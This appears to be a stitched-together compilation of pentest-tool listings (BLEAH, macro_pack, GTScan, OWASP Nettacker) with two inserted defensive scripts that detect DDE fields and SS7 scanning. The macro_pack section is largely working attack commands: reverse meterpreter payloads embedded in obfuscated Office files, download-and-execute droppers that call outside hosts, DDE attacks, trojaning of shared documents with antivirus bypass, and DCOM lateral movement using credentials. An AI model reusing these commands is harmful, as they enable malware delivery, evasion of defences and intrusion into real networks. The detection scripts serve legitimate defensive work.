BLEAH – A BLE Scanner For “Smart” Devices Hacking

A BLE scanner for “smart” devices hacking based on the bluepy library, dead easy to use because retarded devices should be dead easy to hack. Explanatory post and screenshots can be found here.

How to Install

Install bluepy from source:

    git clone https://github.com/IanHarvey/bluepy.git
    cd bluepy
    python setup.py build
    sudo python setup.py install

Then install bleah:

    git clone https://github.com/evilsocket/bleah.git
    cd bleah
    python setup.py build
    sudo python setup.py install

Usage

From the -h help menu:

    usage: bleah [-h] [-i HCI] [-t TIMEOUT] [-s SENSITIVITY] [-b MAC] [-f] [-e] [-u UUID] [-d DATA] [-r DATAFILE]

    optional arguments:
      -h, --help            show this help message and exit
      -i HCI, --hci HCI     HCI device index.
      -t TIMEOUT, --timeout TIMEOUT
                            Scan delay, 0 for continuous scanning.
      -s SENSITIVITY, --sensitivity SENSITIVITY
                            dBm threshold.
      -b MAC, --mac MAC     Filter by device address.
      -f, --force           Try to connect even if the device doesn't allow to.
      -e, --enumerate       Connect to available devices and perform services enumeration.
      -u UUID, --uuid UUID  Write data to this characteristic UUID (requires --mac and --data).
      -d DATA, --data DATA  Data to be written.
      -r DATAFILE, --datafile DATAFILE
                            Read data to be written from this file.

Examples

Keep scanning for BTLE devices:

    sudo bleah -t0

Connect to a specific device and enumerate all the things:

    sudo bleah -b "aa:bb:cc:dd:ee:ff" -e

Write the bytes hello world to a specific characteristic of the device:

    sudo bleah -b "aa:bb:cc:dd:ee:ff" -u "c7d25540-31dd-11e2-81c1-0800200c9a66" -d "hello world"

Download BLEAH

Link: http://feedproxy.google.com/~r/PentestTools/~3/Mhqq4sdlgxk/bleah-ble-scanner-for-smart-devices.html

macro_pack – Tool Used To Automatize Obfuscation And Generation Of Ms Office Documents For Pentest, Demo, And Social Engineering Assessments

The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS-like formats. This tool can be used for redteaming, pentests, demos, and social engineering assessments. macro_pack will simplify antimalware solutions bypass and automatize the process from VBA generation to final Office document generation.

It is very simple to use:

- No configuration
- Everything can be done using a single line of code
- Generation of majority of Office formats and VBS based formats
- Advanced VBA macro attacks as well as DDE attacks

The tool is compatible with payloads generated by popular pentest tools (Metasploit, Empire, …). It is also easy to combine with other tools as it is possible to read input from stdin and have a quiet output to another tool. This tool is written in Python3 and works on both Linux and Windows platforms.

Note: Windows platform with the right MS Office applications installed is required for Office documents automatic generation or trojan features.

Obfuscation

The tool will use various obfuscation techniques, all automatic. The obfuscation feature is compatible with all formats that can be generated by macro_pack, VBA or VBS based.

Basic obfuscation (-o option) includes:

- Renaming functions
- Renaming variables
- Removing spaces
- Removing comments
- Encoding Strings

Note that the main goal of macro_pack obfuscation is not to prevent reverse engineering, it is to prevent antivirus detection.

Generation

Macro Pack can generate several kinds of MS Office documents and script formats. The format will be automatically guessed depending on the given file extension.
File generation is done using the option --generate or -G.

Macro Pack pro version also allows to trojan existing files with option --trojan or -T.

MS Office supported formats are:

- MS Word 97 (.doc)
- MS Word (.docm, .docx)
- MS Excel 97 (.xls)
- MS Excel (.xlsm)
- MS PowerPoint (.pptm)
- MS Visio 97 (.vsd)
- MS Visio (.vsdm)
- MS Project (.mpp)

Scripting (txt) supported formats are:

- VBA text file (.vba)
- VBS text file (.vbs)
- Windows Script Host (.wsh)
- Windows Script Components scriptlets (.wsc, .sct)
- HTML Applications (.hta)

Note that all scripting formats can be generated on Linux version of macro_pack as well.

Ethical use

The macro_pack tool shall only be used by pentesters, security researchers, or other people with learning purpose. I condemn all use of security tools for unethical actions (whether these are legal or illegal). I know this will not prevent usage by malicious people and that is why all features are not publicly released.

About pro mode…

You may notice that not all parts of macro_pack are available. Only the community version is available online. I fear the features in the pro version are really too much “weaponizing” the process and I do not want it available to all script kiddies out there.
The pro mode includes features such as:

- Advanced antimalware bypass
- VBOM security bypass
- Self decoding VBA
- MS Office persistence
- Trojan existing MS Office documents
- Lateral movement using DCOM objects
- Anti-debug using http://seclists.org/fulldisclosure/2017/Mar/90

For now I do not plan to release or sell this pro version, however if you are really interested I can share the pro binary in the next case:

- You significantly contribute to macro_pack on GitHub + I need to know your identity

Run/Install

Run Windows binary

- Get the latest binary from https://github.com/sevagas/macro_pack/releases/
- Download binary on PC with genuine Microsoft Office installed.
- Open console, CD to binary dir and call the binary, simple as that!

    macro_pack.exe --help

Install from sources

Download and install dependencies:

    git clone https://github.com/sevagas/macro_pack.git
    cd macro_pack
    pip3 install -r requirements.txt

Note: For Windows, you also need to download manually pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/

The tool is in python 3 so just start with your python3 install.
ex:

    python3 macro_pack.py --help
    # or
    python macro_pack.py --help # if python3 is default install

If you want to produce a standalone exe using pyinstaller:

- Install PyCrypto at http://www.voidspace.org.uk/python/pycrypto-2.6.1/
- Double-click on the "build.bat" script on a Windows machine.

The resulting macro_pack.exe will be inside the bin directory.

Some examples

macro_pack community

Obfuscate the vba file generated by msfvenom and put result in a new vba file.

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

Obfuscate Empire stager vba file and generate a MS Word document:

    macro_pack.exe -f empire.vba -o -G myDoc.docm

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

    echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"

Create a word 97 document containing an obfuscated VBA reverse meterpreter payload inside a share folder:

    msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G \\REMOTE-PC\Share\meter.doc

Download and execute Empire Launcher stager without powershell.exe by using DROPPER_PS template

    # 1 Generate a file containing Empire launcher
    # 2 Make that file available on web server, ex with netcat:
    { echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat empire_stager.cmd; } | nc -l -p 6666 -q1
    # 3 Use macro_pack to generate DROPPER_PS payload in Excel file
    echo http://10.5.5.12:6543/empire_stager.cmd | macro_pack.exe -o -t DROPPER_PS -G join_the_empire.xls
    # 4 When executed on target, the macro will download PowerShdll, run it with rundll32, and download and execute stager.

Execute calc.exe via Dynamic Data Exchange (DDE) attack

    echo calc.exe | macro_pack.exe --dde -G dde_test.docx

Download and execute file via powershell using Dynamic Data Exchange (DDE) attack

    # 1 Change the target file URL in resources\community\ps_dl_exec.cmd
    # 2 Embed download execute cmd in document
    python macro_pack.py --dde -f ..\resources\community\ps_dl_exec.cmd -G DDE.doc

Generate obfuscated Meterpreter reverse TCP VBS file and run it

    # 1 Generate obfuscated VBS based on meterpreter template
    echo <port> | macro_pack.exe -t METERPRETER -o -G meter.vbs
    # 2 On attacker machine Setup meterpreter listener
    Open msfconsole:
    use exploit/multi/handler
    set LHOST 0.0.0.0
    set PAYLOAD windows/meterpreter/reverse_tcp
    set AutoRunScript post/windows/manage/migrate
    set EXITFUNC thread
    set ExitOnSession false
    set EnableUnicodeEncoding true
    set EnableStageEncoding true
    # 3 run VBS file with wscript (run 32bit wscript because meterpreter payload is 32bit)
    %windir%\SysWoW64\wscript meter.vbs

Generate obfuscated HTA file which executes "systeminfo" and returns result to another macro_pack listening on 192.168.0.5

    # 1 Generate HTA file with CMD template
    echo http://192.168.0.5:1234/a "systeminfo" | macro_pack.exe -t CMD -o -G info.hta
    # 2 On 192.168.0.5 open macro_pack as http listener
    macro_pack.exe -l 1234
    # 3 run hta file with mshta
    mshta.exe full/path/to/info.hta

Generate obfuscated Meterpreter reverse https TCP SCT file and run it

    # 1 Generate obfuscated VBS scriptlet based on meterpreter reverse HTTPS template
    echo <ip> <port> | macro_pack.exe -t WEBMETER -o -G meter.sct
    # 2 On attacker machine Setup meterpreter listener
    Open msfconsole:
    use exploit/multi/handler
    set PAYLOAD windows/x64/meterpreter/reverse_https
    set LHOST <attacker_ip> # NOTE this cannot be 0.0.0.0 for reverse https
    set LPORT <port>
    set AutoRunScript post/windows/manage/migrate
    set EXITFUNC thread
    set ExitOnSession false
    set EnableUnicodeEncoding true
    set EnableStageEncoding true
    exploit -j
    # 3 run scriptlet with regsvr32
    regsvr32 /u /n /s /i:meter.sct scrobj.dll

macro_pack pro

Trojan the existing shared "report.xlsm" file with a dropper.
Use anti-AV and anti-debug features.

    echo "http://10.5.5.12/drop.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER2 --trojan --av-bypass --stealth -G "E:\accounting\report.xls"

Generate a Word file containing VBA self encoded x64 reverse meterpreter VBA payload (will bypass most AV). Keep-alive is needed because we need meterpreter to stay alive before we migrate.

    msfvenom.bat -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o --vbom-encode --keep-alive -G out.docm

Trojan a PowerPoint file with a reverse meterpreter. Macro is obfuscated and mangled to bypass most antiviruses.

    msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o --av-bypass --trojan -G hotpics.pptm

Execute a macro on a remote PC using DCOM

    REM Step 1: Ensure you have enough rights
    net use \\192.168.0.8\c$ /user:domain\username password
    REM Step 2: Generate document, for example here, meterpreter reverse TCP Excel file
    echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G meter.xlsm
    REM Step 3: Copy the document somewhere on remote share
    copy meter.xlsm "\\192.168.0.8\c$\users\username\meter.xlsm"
    REM Step 4: Execute!
    macro_pack.exe --dcom="\\192.168.0.8\c$\users\username\meter.xlsm"
    REM Step 2 to 4 in one step:
    echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G "\\192.168.0.8\c$\users\username\meter.xlsm" --dcom="\\192.168.0.8\c$\users\username\meter.xlsm"

All available options

General options:

    -f, --input-file=INPUT_FILE_PATH A VBA macro file or file containing params for --template option
        If no input file is provided, input must be passed via stdin (using a pipe).
    -q, --quiet Do not display anything on screen, just process request.
    -o, --obfuscate Same as '--obfuscate-form --obfuscate-names --obfuscate-strings'
    --obfuscate-form Modify readability by removing all spaces and comments in VBA
    --obfuscate-strings Randomly split strings and encode them
    --obfuscate-names Change functions, variables, and constants names
    -s, --start-function=START_FUNCTION Entry point of macro file
        Note that macro_pack will automatically detect AutoOpen, Workbook_Open, or Document_Open as the start function
    -t, --template=TEMPLATE_NAME Use VBA template already included in macro_pack.exe.
        Available templates are: HELLO, CMD, DROPPER, DROPPER2, DROPPER_PS, DROPPER_DLL, METERPRETER, EMBED_EXE
        Help for template usage: macro_pack.exe -t help
    -G, --generate=OUTPUT_FILE_PATH. Generates a file containing the macro. Will guess the format based on extension.
        Supported extensions are: vba, vbs, hta, doc, docm, xls, xlsm, pptm, vsd, vsdm.
        Note: Apart from vba which is a text files, all other requires Windows OS with right MS Office application installed.
    -e, --embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document.
        Use with EMBED_EXE template to auto drop and exec the file.
    --dde Dynamic Data Exchange attack mode. Input will be inserted as a cmd command and executed via DDE
        DDE attack mode is not compatible with VBA Macro related options.
        Usage: echo calc.exe | macro_pack.exe --dde -W DDE.docx
        Note: This option requires Windows OS with genuine MS Office installed.
    --run=FILE_PATH Open document using COM to run macro. Can be useful to bypass whitelisting situations.
        This will trigger AutoOpen/Workbook_Open automatically.
        If no auto start function, use --start-function option to indicate which macro to run.
    -l, --listen=PORT Open an HTTP server listening on defined port.
    -h, --help Displays help and exit

    Notes:
    If no output file is provided, the result will be displayed on stdout.
    Combine this with -q option to pipe only processed result into another program
    ex: macro_pack.exe -f my_vba.vba -o -q | another_app
    Another valid usage is:
    cat input_file.vba | macro_pack.exe -o -q > output_file.vba

macro_pack Pro only:

    --vbom-encode Use VBA self encoding to bypass antimalware detection and enable VBOM access (will exploit VBOM self activation vuln).
        --start-function option may be needed.
    --av-bypass Use various tricks efficient to bypass most av (combine with -o for best result)
    --keep-alive Use with --vbom-encode option. Ensure new app instance will stay alive even when macro has finished
    --persist Use with --vbom-encode option. Macro will automatically be persisted in application startup path
        (works with Excel documents only). The macro will then be executed anytime an Excel document is opened (even non-macro documents).
    -T, --trojan=OUTPUT_FILE_PATH Inject macro in an existing MS office file.
        Supported files are the same as for the -G option.
        Files will also be converted to appropriate format, ex: pres.pptx will become pres.pptm
        If file does not exist, it will be created (like -G option)
    --stealth Anti-debug and hiding features
    --dcom=REMOTE_FILE_PATH Open remote document using DCOM for pivot/remote exec if psexec not possible for example.
        This will trigger AutoOpen/Workbook_Open automatically.
        If no auto start function, use --start-function option to indicate which macro to run.

Template usage

Templates can be called using -t, --template=TEMPLATE_NAME combined with other options.

Here are all the available templates.

HELLO

Just print a hello message and awareness about macro.
Give this template the name or email of the author.

    -> Example: echo "@Author" | macro_pack.exe -t HELLO -G hello.pptm

CMD

Execute a command line and send result to remote http server.
Give this template the server url and the command to run.

    -> Example: echo "http://192.168.0.5:7777" "dir /Q C:" | macro_pack.exe -t CMD -o -G cmd.doc
    # Catch result with any webserver or netcat
    nc -l -p 7777

DROPPER

Download and execute a file.
Give this template the file url and the target file path.

    -> Example: echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER -o -G dropper.xls

DROPPER2

Download and execute a file. File attributes are also set to system, read-only, and hidden.
Give this template the file url and the target file path.

    -> Example: echo <file_to_drop_url> "<download_path>" | macro_pack.exe -t DROPPER2 -o -G dropper.xlsm

DROPPER_PS

Download and execute Powershell script using rundll32 (to bypass blocked powershell.exe).
Note: This payload will download PowerShdll from Github.
Give this template the url of the powershell script you want to run.

    -> Example: echo "<powershell_script_url>" | macro_pack.exe -t DROPPER_PS -o -G powpow.doc

DROPPER_DLL

Download a DLL with another extension and run it using Office VBA.

-> Example, load meterpreter DLL using Office:

    REM Generate meterpreter dll payload
    msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f dll -o meter.dll
    REM Make it available on webserver, ex using netcat on port 6666
    { echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat meter.dll; } | nc -l -p 6666 -q1
    REM Create Office file which will download DLL and call it
    REM The DLL URL is http://192.168.0.5:6666/normal.html and it will be saved as .asd file
    echo "http://192.168.0.5:6666/normal.html" Run | macro_pack.exe -t DROPPER_DLL -o -G meterdll.xls

METERPRETER

Meterpreter reverse TCP template using MacroMeter by Cn33liz.
This template is a CSharp Meterpreter Stager built by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.
Give this template the IP and PORT of the listening msfconsole.

    -> Example: echo <ip> <port> | macro_pack.exe -t METERPRETER -o -G meter.docm

Recommended msfconsole options (use exploit/multi/handler):

    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST <ip>
    set LPORT <port>
    set AutoRunScript post/windows/manage/migrate
    set EXITFUNC thread
    set ExitOnSession false
    set EnableUnicodeEncoding true
    set EnableStageEncoding true
    exploit -j

WEBMETER

Meterpreter reverse TCP template using VbsMeter by Cn33liz.
This template is a CSharp Meterpreter Stager built by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.
Give this template the IP and PORT of the listening msfconsole.

    -> Example: echo <ip> <port> | macro_pack.exe -t WEBMETER -o -G meter.vsd

Recommended msfconsole options (use exploit/multi/handler):

    set PAYLOAD windows/meterpreter/reverse_https (32bit)
    set PAYLOAD windows/x64/meterpreter/reverse_https (64bit)
    set AutoRunScript post/windows/manage/migrate
    set LHOST <ip>
    set LPORT <port>
    set EXITFUNC thread
    set ExitOnSession false
    set EnableUnicodeEncoding true
    set EnableStageEncoding true
    exploit -j

EMBED_EXE

Combine with --embed option, it will drop and execute (hidden) the embedded file.
Optionally you can give to the template the path where the file should be extracted.
If extraction path is not given, file will be extracted with random name in current path.

    -> Example1: macro_pack.exe -t EMBED_EXE --embed=%%windir%%\system32\calc.exe -o -G my_calc.vbs
    -> Example2: echo "path\\to\newcalc.exe" | macro_pack.exe -t EMBED_EXE --embed=%%windir%%\system32\calc.exe -o -G my_calc.doc

Efficiency

The various features were tested against locally installed Antimalware solutions as well as online service.
I ran multiple tests with several kinds of payloads and macro_pack features. A majority of antivirus will be evaded by the simple "obfuscate" option. Features available in pro mode generally ensure full AV bypass.

Example with Empire VBA stager:

Here are the results of NoDistribute scanner for the regular Empire VBA stager

Here are the results with the macro_pack -o (--obfuscate) option

Warning: Do not submit your samples to online scanners (ex VirusTotal). It's the best way to break your stealth macro. I also suggest you do not submit to non reporting sites such as NoDistribute. You cannot be sure what these sites will do with the data you submit. If you have an issue with macro_pack AV detection you can write to us for advice or submit an issue or pull request.

Relevant resources

Blog posts about MS Office security:

- http://blog.sevagas.com/?My-VBA-Bot (write a full VBA RAT, includes how to bypass VBOM protection)
- http://pwndizzle.blogspot.fr/2017/03/office-document-macros-ole-actions-dde.html
- https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ (About Dynamic Data Exchange attacks)
- https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
- https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/

Other useful links:

- https://github.com/p3nt4/PowerShdll (Run PowerShell with dlls only)
- https://gist.github.com/vivami/03780dd512fec22f3a2bae49f9023384 (Run PowerShell script with PowerShdll VBA implementation)
- https://enigma0x3.net/2016/03/15/phishing-with-empire/ (Generate Empire VBA payload)
- https://github.com/EmpireProject/Empire
- https://medium.com/@vivami/phishing-between-the-app-whitelists-1b7dcdab4279
- https://www.metasploit.com/
- https://github.com/Cn33liz/MacroMeter
- https://github.com/khr0x40sh/MacroShop

Download macro_pack

Link: http://feedproxy.google.com/~r/PentestTools/~3/L18DQzXLRXo/macropack-tool-used-to-automatize.html
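
For defenders triaging documents like the ones the --dde mode produces, the DDE command lives in a Word field instruction, which can be split across several runs and must be reassembled before matching. The scanner below is an added example, not part of macro_pack; the in-memory .docx is a minimal constructed container and its field contents are placeholder strings.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
FLD_CHAR, FLD_TYPE = f"{{{W}}}fldChar", f"{{{W}}}fldCharType"
FLD_SIMPLE, INSTR_ATTR = f"{{{W}}}fldSimple", f"{{{W}}}instr"
INSTR_TEXT = f"{{{W}}}instrText"
MAX_PART_BYTES = 20 * 1024 * 1024      # skip parts whose declared size is huge
DDE_RE = re.compile(r"^DDE(AUTO)?\b", re.IGNORECASE)


def field_instructions(xml_bytes):
    """Return every field instruction in one XML part, reassembled across runs."""
    root = ET.fromstring(xml_bytes)
    found, open_fields = [], []        # open_fields is a stack: fields can nest
    for el in root.iter():             # document order
        if el.tag == FLD_SIMPLE:
            found.append(el.get(INSTR_ATTR, ""))
        elif el.tag == FLD_CHAR:
            kind = el.get(FLD_TYPE)
            if kind == "begin":
                open_fields.append([])
            elif kind == "end" and open_fields:
                found.append("".join(open_fields.pop()))
        elif el.tag == INSTR_TEXT and open_fields:
            open_fields[-1].append(el.text or "")
    # Fields that never reach an "end" marker are still reported.
    found.extend("".join(parts) for parts in open_fields)
    return [text.strip() for text in found if text.strip()]


def find_dde_fields(docx_bytes):
    """Return (part name, instruction) for each DDE/DDEAUTO field in word/*.xml."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            if info.file_size > MAX_PART_BYTES:
                hits.append((name, "<part too large, not scanned>"))
                continue
            for instr in field_instructions(zf.read(name)):
                if DDE_RE.match(instr):
                    hits.append((name, instr))
    return hits


def build_sample_docx():
    """Constructed sample: one DDEAUTO field split over three runs, one PAGE field."""
    document = (
        f'<w:document xmlns:w="{W}"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> DD</w:instrText></w:r>'
        '<w:r><w:instrText xml:space="preserve">EAUTO </w:instrText></w:r>'
        '<w:r><w:instrText>"constructed-app" "constructed-topic"</w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>placeholder result</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>'
    )
    header = f'<w:hdr xmlns:w="{W}"><w:p><w:fldSimple w:instr=" PAGE "/></w:p></w:hdr>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", document)
        zf.writestr("word/header1.xml", header)
    return buf.getvalue()


if __name__ == "__main__":
    for part, instr in find_dde_fields(build_sample_docx()):
        print(f"{part}: {instr}")
```

For untrusted input at scale, swap the standard-library XML parser for a hardened one; the size cap here only limits the declared size of each part.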

GTScan – The Nmap Scanner for Telco

The Nmap Scanner for Telco. With the current focus on telecom security, the tools used in day-to-day IT-side penetration testing should be extended to telecom as well. From here came the motivation for an nmap-like scanner but for telco.

The current interconnect security controls might fail against reconnaissance. Although mobile operators might implement SMS firewalls/proxies and interconnect firewalls, some of those leak information that could be used for further information gathering.

The motivation behind this project is, first, adding a new toolkit to the arsenal of telecom penetration testers and, second, giving mobile operators a way to test their controls against a primitive methodology such as information gathering and reconnaissance.

How does it work

GTScan relies on using empty TCAP layers as probes to detect listening subsystem numbers (i.e. application port numbers like 80 for http, 443 for https, but for telecom nodes) on the respective global titles. This way you will be able to map the network and use the results to conduct targeted direct attacks to the respective nodes.

GTScan includes message handling: return message on error in the SCCP layer, to determine from the response what the scanned node is. If a TCAP abort message is returned with the error p-abortCause: unrecognizedMessageType (0), the destination node is listening on the SSN that was scanned; otherwise the scanner continues scanning other SSNs.

You can provide GTScan a range of global titles to be scanned, a comma-separated list, or a single GT to be scanned, along with other parameters.

Requirements

    python3
    pyfiglet==0.7.5
    termcolor==1.1.0
    colorama==0.3.9

And of course an SS7/Sigtran access :)

Usage

    ./GTScan.py -G 201500000000,201500000002 -g 965123456780 -c 1 -C 2 -p 2905 -P 2906 -l 192.168.56.1 -r 192.168.56.102

Download GTScan

Link: http://feedproxy.google.com/~r/PentestTools/~3/4xA__JuUvL4/gtscan-nmap-scanner-for-telco.html
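
Seen from the operator side, the probing described under "How does it work" appears as one calling GT sending component-less TCAP to many (called GT, SSN) pairs in a short time. The detector below is an added example, not part of GTScan; the record fields, thresholds and GT values are assumptions constructed for illustration, not a real product's log schema.

```python
from collections import defaultdict, deque


def detect_gt_sweeps(events, window=60, min_targets=8):
    """Flag calling GTs that probe many (called GT, SSN) pairs with empty TCAP.

    events: dicts sorted by 'ts' (seconds) with the assumed keys
    calling_gt, called_gt, ssn and tcap_components.
    Returns {calling_gt: {"first_alert_ts", "called_gts", "ssns"}}.
    """
    recent = defaultdict(deque)   # calling GT -> (ts, called GT, SSN) inside window
    alerts = {}
    for ev in events:
        if ev["tcap_components"] != 0:
            continue              # messages carrying real operations are not probes
        src = ev["calling_gt"]
        q = recent[src]
        q.append((ev["ts"], ev["called_gt"], ev["ssn"]))
        while ev["ts"] - q[0][0] > window:
            q.popleft()           # expire probes older than the window
        targets = {(gt, ssn) for _, gt, ssn in q}
        if len(targets) >= min_targets and src not in alerts:
            alerts[src] = {
                "first_alert_ts": ev["ts"],
                "called_gts": sorted({gt for gt, _ in targets}),
                "ssns": sorted({ssn for _, ssn in targets}),
            }
    return alerts


def _ev(ts, calling, called, ssn, components):
    return {"ts": ts, "calling_gt": calling, "called_gt": called,
            "ssn": ssn, "tcap_components": components}


def sample_events():
    """Constructed records: one sweep, one normal peer, one slow sparse sender."""
    events, ts = [], 100
    # Sweep: SSNs 5..10 on two nodes, one empty TCAP message per second.
    for called in ("990000000100", "990000000101"):
        for ssn in range(5, 11):
            events.append(_ev(ts, "990000000001", called, ssn, 0))
            ts += 1
    # Normal peer: repeated real operations towards SSN 6 (HLR).
    for i in range(20):
        events.append(_ev(100 + i, "990000000002", "990000000100", 6, 1))
    # Sparse empty messages ten minutes apart: never enough inside one window.
    for i, ssn in enumerate((6, 7, 8)):
        events.append(_ev(100 + 600 * i, "990000000003", "990000000100", ssn, 0))
    return sorted(events, key=lambda e: e["ts"])


if __name__ == "__main__":
    for gt, detail in detect_gt_sweeps(sample_events()).items():
        print(gt, detail)
```

The same counters can be fed from the response side by counting outbound TCAP aborts with p-abortCause unrecognizedMessageType per remote GT.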

OWASP-Nettacker – Automated Penetration Testing Framework

OWASP Nettacker project is created to automate information gathering, vulnerability scanning and eventually generating a report for networks, including services, bugs, vulnerabilities, misconfigurations, and other information. This software will utilize TCP SYN, ACK, ICMP and many other protocols in order to detect and bypass Firewall/IDS/IPS devices. By leveraging a unique method for discovering protected services and devices such as SCADA, OWASP Nettacker gains a competitive edge over other scanners, making it one of the best.

[ASCII-art banner: OWASP Nettacker, Version 0.0.1 SAME, github.com/viraintel, owasp.org, viraintel.com]

    usage: Nettacker [-L LANGUAGE] [-v VERBOSE_LEVEL] [-V] [-c] [-o LOG_IN_FILE]
                     [--graph GRAPH_FLAG] [-h] [-i TARGETS] [-l TARGETS_LIST]
                     [-m SCAN_METHOD] [-x EXCLUDE_METHOD] [-u USERS]
                     [-U USERS_LIST] [-p PASSWDS] [-P PASSWDS_LIST] [-g PORTS]
                     [-T TIMEOUT_SEC] [-w TIME_SLEEP] [-r] [-s]
                     [-t THREAD_NUMBER] [-M THREAD_NUMBER_HOST] [-R SOCKS_PROXY]
                     [--retries RETRIES] [--ping-before-scan]
                     [--method-args METHODS_ARGS] [--method-args-list]

    Engine:
      Engine input options

      -L LANGUAGE, --language LANGUAGE
                            select a language ['ru', 'fr', 'en', 'nl', 'el', 'vi', 'id', 'de', 'tr', 'ps', 'ur', 'fa', 'hy', 'hi', 'ko', 'it', 'zh-cn', 'ar', 'ja', 'es']
      -v VERBOSE_LEVEL, --verbose VERBOSE_LEVEL
                            verbose mode level (0-5) (default 0)
      -V, --version         show software version
      -c, --update          check for update
      -o LOG_IN_FILE, --output LOG_IN_FILE
                            save all logs in file (results.txt, results.html, results.json)
      --graph GRAPH_FLAG    build a graph of all activities and information, you must use HTML output.
                            available graphs: ['d3_tree_v1_graph', 'd3_tree_v2_graph', 'jit_circle_v1_graph']
      -h, --help            Show Nettacker Help Menu

    Target:
      Target input options

      -i TARGETS, --targets TARGETS
                            target(s) list, separate with ","
      -l TARGETS_LIST, --targets-list TARGETS_LIST
                            read target(s) from file

    Method:
      Scan method options

      -m SCAN_METHOD, --method SCAN_METHOD
                            choose scan method ['ftp_brute', 'smtp_brute', 'ssh_brute', 'dir_scan', 'tcp_connect_port_scan', 'viewdns_reverse_ip_lookup_scan', 'all']
      -x EXCLUDE_METHOD, --exclude EXCLUDE_METHOD
                            choose scan method to exclude ['ftp_brute', 'smtp_brute', 'ssh_brute', 'dir_scan', 'tcp_connect_port_scan', 'viewdns_reverse_ip_lookup_scan']
      -u USERS, --usernames USERS
                            username(s) list, separate with ","
      -U USERS_LIST, --users-list USERS_LIST
                            read username(s) from file
      -p PASSWDS, --passwords PASSWDS
                            password(s) list, separate with ","
      -P PASSWDS_LIST, --passwords-list PASSWDS_LIST
                            read password(s) from file
      -g PORTS, --ports PORTS
                            port(s) list, separate with ","
      -T TIMEOUT_SEC, --timeout TIMEOUT_SEC
                            read passwords(s) from file
      -w TIME_SLEEP, --time-sleep TIME_SLEEP
                            time to sleep between each request
      -r, --range           scan all IPs in the range
      -s, --sub-domains     find and scan subdomains
      -t THREAD_NUMBER, --thread-connection THREAD_NUMBER
                            thread numbers for connections to a host
      -M THREAD_NUMBER_HOST, --thread-hostscan THREAD_NUMBER_HOST
                            thread numbers for scan hosts
      -R SOCKS_PROXY, --socks-proxy SOCKS_PROXY
                            outgoing connections proxy (socks). example socks5: 127.0.0.1:9050, socks://127.0.0.1:9050, socks5://127.0.0.1:9050 or socks4: socks4://127.0.0.1:9050, authentication: socks://username:password@127.0.0.1, socks4://username:password@127.0.0.1, socks5://username:password@127.0.0.1
      --retries RETRIES     Retries when the connection timeout (default 3)
      --ping-before-scan    ping before scan the host
      --method-args METHODS_ARGS
                            enter methods inputs, example: "ftp_brute_users=test,admin&ftp_brute_passwds=read_from_file:/tmp/pass.txt&ftp_brute_port=21"
      --method-args-list    list all methods args

Features

- IoT Scanner
- Python Multi Thread & Multi Process Network Information Gathering Vulnerability Scanner
- Service and Device Detection (SCADA, Restricted Areas, Routers, HTTP Servers, Logins and Authentications, None-Indexed HTTP, Paradox System, Cameras, Firewalls, UTM, WebMails, VPN, RDP, SSH, FTP, TELNET Services, Proxy Servers and Many Devices like Juniper, Cisco, Switches and many more…)
- Network Service Analysis
- Services Brute Force Testing
- Services Vulnerability Testing
- HTTP/HTTPS Crawling, Fuzzing, Information Gathering and …
- HTML and Text Outputs

This project is at the moment in research and development phase and most of results/codes are not published yet.

About

- OWASP Page: https://www.owasp.org/index.php/OWASP_Nettacker
- Home: http://nettacker.z3r0d4y.com/
- Github: https://github.com/viraintel/OWASP-Nettacker
- Mailing List: https://groups.google.com/forum/#!forum/owasp-nettacker
- Docker Image: https://hub.docker.com/r/alirazmjoo/owaspnettacker/

Download OWASP-Nettacker

Link: http://feedproxy.google.com/~r/PentestTools/~3/vegIVHSu2hk/owasp-nettacker-automated-penetration.html